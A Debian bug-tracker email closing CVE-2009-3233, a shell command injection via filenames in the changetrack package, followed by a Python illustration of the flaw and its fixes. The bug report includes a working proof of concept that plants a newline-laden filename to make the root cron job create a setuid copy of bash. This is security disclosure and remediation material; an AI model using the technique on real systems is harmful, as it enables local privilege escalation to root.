Your message dated Wed, 16 Dec 2009 23:38:46 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.3-3+lenny1
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages changetrack depends on:
ii libfile-ncopy-perl 0.34-1 file copying like cp for perl
ii perl 5.10.0-19 Larry Wall's Practical Extraction
Versions of packages changetrack recommends:
ii cron 3.0pl1-105 management of regular background p
ii ed 0.7-3 The classic unix line editor
changetrack suggests no packages.
-- no debconf information
It is possible to run commands as root if you have permission to create
files in a directory checked via changetrack, example:
mkdir /etc/test
touch "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash bash.ultimate
chmod ug+s bash.ultimate
"
echo "/etc/test/*" >> /etc/changetrack.conf
wait for /etc/cron.hourly/changetrack
# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate
bash.ultimate -p ;)
Probably changetrack should not use shell commands, or should escape sh special
characters like spaces, enters, ';' etc...
--
Regards
Marek Grzybowski
--- End Message ---
--- Begin Message ---
Source: changetrack
Source-Version: 4.3-3+lenny1
We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:
changetrack_4.3-3+lenny1.diff.gz
to main/c/changetrack/changetrack_4.3-3+lenny1.diff.gz
changetrack_4.3-3+lenny1.dsc
to main/c/changetrack/changetrack_4.3-3+lenny1.dsc
changetrack_4.3-3+lenny1_all.deb
to main/c/changetrack/changetrack_4.3-3+lenny1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+lenny1
Distribution: stable-security
Urgency: medium
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description:
changetrack - configuration-file change tracker
Closes: 546791
Changes:
changetrack (4.3-3+lenny1) stable-security; urgency=medium
.
* Fix possible local exploit by rejecting filenames with unsafe
characters (cf. CVE-2009-3233). Thanks to Marek Grzybowski and
Andrzej Lemieszek.
(Closes: #546791)
Checksums-Sha1:
4645f9452c04d593cf24cfb49da6c22594b8143a 1110 changetrack_4.3-3+lenny1.dsc
820410611c2520f39653b9f50f149dfa632a421e 16567 changetrack_4.3.orig.tar.gz
0fcd2813562a9942189fbd1eeeee2f39848bc4fb 13325 changetrack_4.3-3+lenny1.diff.gz
f1afc814784c9f1975c94610fb55bb89a58ad841 21678 changetrack_4.3-3+lenny1_all.deb
Checksums-Sha256:
e106ada0d20a1afeb86d1c5e840b83b3f0bc3001c1f3621bbbbc87b2da1900e3 1110 changetrack_4.3-3+lenny1.dsc
016d7817dcc6840ae50d9f4a1917679087765b7985cfc5eb088d68b8270ff5c7 16567 changetrack_4.3.orig.tar.gz
defe00ae7b26f299437b8a18dabed1e0568fe3fe8aaf96af9e6793d9fa221a08 13325 changetrack_4.3-3+lenny1.diff.gz
12f0d22ad6f56e3798c4547656a6bfc7962de09b67192a69734b9c9fdbfd199c 21678 changetrack_4.3-3+lenny1_all.deb
Files:
5e689f11bc4dca83328cda0a888ec1e4 1110 utils optional changetrack_4.3-3+lenny1.dsc
7600e72b299562c6773e9b6ac38aaa55 16567 utils optional changetrack_4.3.orig.tar.gz
c91d4a3d370dfe41ff41e6815eda7440 13325 utils optional changetrack_4.3-3+lenny1.diff.gz
3b9fb111a49aa671886f6e5eaec66908 21678 utils optional changetrack_4.3-3+lenny1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)
iJwEAQECAAYFAkq2ZAkACgkQiFVdEFPVQL90WAQAwSBJo6ZUl4A+IrDU4go0GdE3
ZG9fOXw2ddxKysp02M/11SpFMRhIQcN5di8i+jMyZKRjnFjtnO4tVK985r+owbI0
XHfrENbzoEl8Am5PCXD1WwG6N4nnfb+AOdPtX3GyNpNV+Me+of0in+AKBaEPIoN8
f3W6ZehlsUWZk/MRoxM=
=Gd/E
-----END PGP SIGNATURE-----
--- End Message ---
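The two messages above describe the same defect from both sides: the report shows a tracked filename with embedded newlines being handed to the shell by a root cron job, and the changelog says the fix is to reject filenames containing unsafe characters. The following is an added illustration of that pattern and the two standard mitigations; it is not changetrack's code (changetrack itself is a Perl script) and not the Debian patch. It uses a harmless `echo` as the stand-in for the file-copy command, a constructed filename in the spirit of the report, and an allowlist regex that is an assumption about the shape of the fix, not the actual expression shipped in 4.3-3+lenny1.

```python
import re
import subprocess

# Constructed sample names (not from the bug report verbatim). The first
# carries a newline followed by a second command, as in the original report.
CONSTRUCTED_BAD_NAME = "sth\necho INJECTED"
CONSTRUCTED_GOOD_NAME = "etc-hosts.2009-09-15"

# Allowlist in the spirit of the Debian fix: accept only word characters,
# dot, slash and dash. Everything the shell might interpret (whitespace,
# newline, ';', '|', '&', quotes, '$', backticks, ...) is absent from the set.
# Assumption: the real regex used by changetrack 4.3-3+lenny1 may differ.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_./-]+$")


def is_safe_filename(name: str) -> bool:
    """Mitigation 1: refuse names with any character outside the allowlist."""
    return bool(SAFE_NAME.match(name))


def run_via_shell(name: str) -> list:
    """Vulnerable pattern: the filename is spliced into a shell command line.

    A newline or ';' inside the name terminates the intended command and
    whatever follows is executed as a second command with the caller's
    privileges (root, when driven from /etc/cron.hourly).
    """
    proc = subprocess.run(f"echo {name}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def run_without_shell(name: str) -> list:
    """Mitigation 2: pass the filename as a single argv element, no shell.

    The name reaches the program untouched; embedded newlines are just bytes
    in one argument and are never parsed as command separators.
    """
    proc = subprocess.run(["echo", name], capture_output=True, text=True)
    return proc.stdout.splitlines()


def track(name: str) -> list:
    """Hardened entry point combining both mitigations (hypothetical API)."""
    if not is_safe_filename(name):
        raise ValueError(f"refusing to track {name!r}: unsafe characters")
    return run_without_shell(name)


if __name__ == "__main__":
    print("shell interpolation :", run_via_shell(CONSTRUCTED_BAD_NAME))
    print("argv, no shell      :", run_without_shell(CONSTRUCTED_BAD_NAME))
    print("allowlist good name :", is_safe_filename(CONSTRUCTED_GOOD_NAME))
    print("allowlist bad name  :", is_safe_filename(CONSTRUCTED_BAD_NAME))
```

Running it shows `INJECTED` appearing as its own output line only in the shell-interpolated variant; the argv variant echoes the name literally as two lines of text, and the allowlist rejects the name before any command is built. Rejecting names is what the Debian update did; avoiding the shell entirely (list-form `system` in Perl, argv lists here) removes the class of bug rather than one character set, so in new code both checks are worth keeping.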